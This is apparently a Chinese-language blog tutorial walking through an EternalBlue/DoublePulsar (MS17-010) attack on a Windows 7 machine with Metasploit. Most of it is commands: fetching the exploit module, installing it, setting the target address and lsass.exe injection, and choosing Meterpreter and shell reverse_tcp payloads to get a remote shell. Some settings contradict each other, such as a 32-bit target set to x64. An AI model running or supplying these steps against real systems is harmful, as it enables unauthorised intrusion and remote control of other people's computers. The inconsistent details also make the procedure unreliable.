注意事项
64位Linux一般会自带一个Wine,名字是wine64,注意Wine32安装之后的名字是wine而非wine32。(可能有些系统会不同但几率不大)
附上卸载i386的方法
dpkg --remove-architecture i386
可能缺少多架构支持,所以我们安装多架构支持,所以安装win 32
安装攻击32位操作系统所用的的脚本
首先下载利用的脚本:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
下载下来之后要记得解压
然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb
cd Eternalblue-Doublepulsar-Metasploit/ cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
如上图所示,脚本下载并复制到SMB目录下成功
8.接下来我们使用exploit模块(步骤同上,原理同上)------已知靶机是32位的操作系统,我们用常32位的脚本来入侵操作系统
msfconsole search eternalblue #或者search ms17-010
use exploit/windows/smb/eternalblue_doublepulsar set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps set PROCESSINJECT lsass.exe set TARGETARCHITECTURE x64 set rhost 192.168.1.9
show options #查看设置的参数
设置payloads,特别注意和之前的payloads不同(去掉中间的X86,否则会失败)
set payload windows/meterpreter/reverse_tcp exploit #或者run 开始攻击,反弹shell
拓展:
第一种交互式shellpayload设置方法:set payload windows/meterpreter/reverse_tcp (注意:此处的payload里面去掉X86,不然链接不成功)
第二种反弹式shellpayload设置方法:set payload windows/shell/reverse_tcp (注意:此处的payload里面去掉X86,不然链接不成功)
如下图所示,攻击成功,反弹出shell ,可移执行windows 7 的系统命令
查看到靶机的IP地址,还可以执行更多的命令..........